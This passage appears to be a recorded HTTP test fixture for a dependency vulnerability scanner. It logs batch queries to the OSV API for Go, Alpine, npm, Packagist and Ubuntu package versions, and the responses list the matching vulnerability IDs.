{ "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.21.7" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Go_project_with_an_overridden_go_version url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2545 body: | { "results": [ { "vulns": [ { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] } ] } headers: Content-Length: - "2545" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 260 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.21.7" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.21.7" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Go_project_with_an_overridden_go_version,_recursive url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 5077 body: | { "results": [ { "vulns": [ { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] } ] } headers: Content-Length: - "5077" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 141 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.21.7" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Go_project_with_an_overridden_go_version_and_licences url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2545 body: | { "results": [ { "vulns": [ { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] } ] } headers: Content-Length: - "2545" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/PURL_SBOM_case_sensitivity_(api) url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Sarif_with_vulns url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/Scan_locks-many url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 270 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/all_supported_lockfiles_in_the_directory_should_be_checked url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3372 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" }, { "commit": "4579d5538f06c5ef615a15bc67ebb9ac0523a973" }, { "commit": "9de7a0544457c6aba755ccb65abb41b0dc1db70d" }, { "commit": "5d60bd2eb4642b64d00c845e5ca9f1ea41fd6db6" }, { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.13-r0" }, { "package": { "ecosystem": "Packagist", "name": "drupal/core" }, "version": "10.4.5" }, { "package": { "ecosystem": "Packagist", "name": "drupal/simple_sitemap" }, "version": "4.2.1" }, { "package": { "ecosystem": "Packagist", "name": "drupal/tfa" }, "version": "2.0.0-alpha4" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "Packagist", "name": "theseer/tokenizer" }, "version": "1.1.3" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/config_file_can_be_broad url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 1281 body: | { "results": [ { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "CVE-2023-39137", "modified": "2026-03-15T14:11:43.205446Z" }, { "id": "CVE-2023-39139", "modified": "2026-03-14T12:08:30.752661Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] }, { "vulns": [ { "id": "DRUPAL-CORE-2025-005", "modified": "2025-12-10T23:41:07.744028Z" }, { "id": "DRUPAL-CORE-2025-006", "modified": "2025-12-10T23:41:16.689525Z" }, { "id": "DRUPAL-CORE-2025-007", "modified": "2025-12-10T23:41:19.050806Z" }, { "id": "DRUPAL-CORE-2025-008", "modified": "2025-12-10T23:41:00.167393Z" }, { "id": "GHSA-83v7-c2cf-p9c2", "modified": "2025-12-10T23:41:07.744028Z" }, { "id": "GHSA-h89p-5896-f4q8", "modified": "2025-12-10T23:41:19.050806Z" }, { "id": "GHSA-m6vv-vcj8-w8m7", "modified": "2025-12-10T23:41:16.689525Z" }, { "id": "GHSA-mhpg-hpj5-73r2", "modified": "2026-02-03T03:15:35.495869Z" } ] }, { "vulns": [ { "id": "DRUPAL-CONTRIB-2025-083", "modified": "2025-12-10T23:41:32.857305Z" } ] }, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {} ] } headers: Content-Length: - "1281" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/config_file_is_invalid url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/config_files_should_not_have_multiple_ignores_with_the_same_id url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 638 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/cyclonedx_1.4_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 107 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {} ] } headers: Content-Length: - "107" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 638 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/cyclonedx_1.5_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 107 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {} ] } headers: Content-Length: - "107" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/exclude_with_exact_directory_name url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/exclude_with_glob_pattern url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/exclude_with_multiple_exact_directories url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 278 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/exclude_with_multiple_pattern_types url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/exclude_with_regex_pattern url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 156 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/folder_of_supported_sbom_with_only_unimportant url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 97 body: | { "results": [ { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] } ] } headers: Content-Length: - "97" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 156 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu", "name": "pcre3" }, 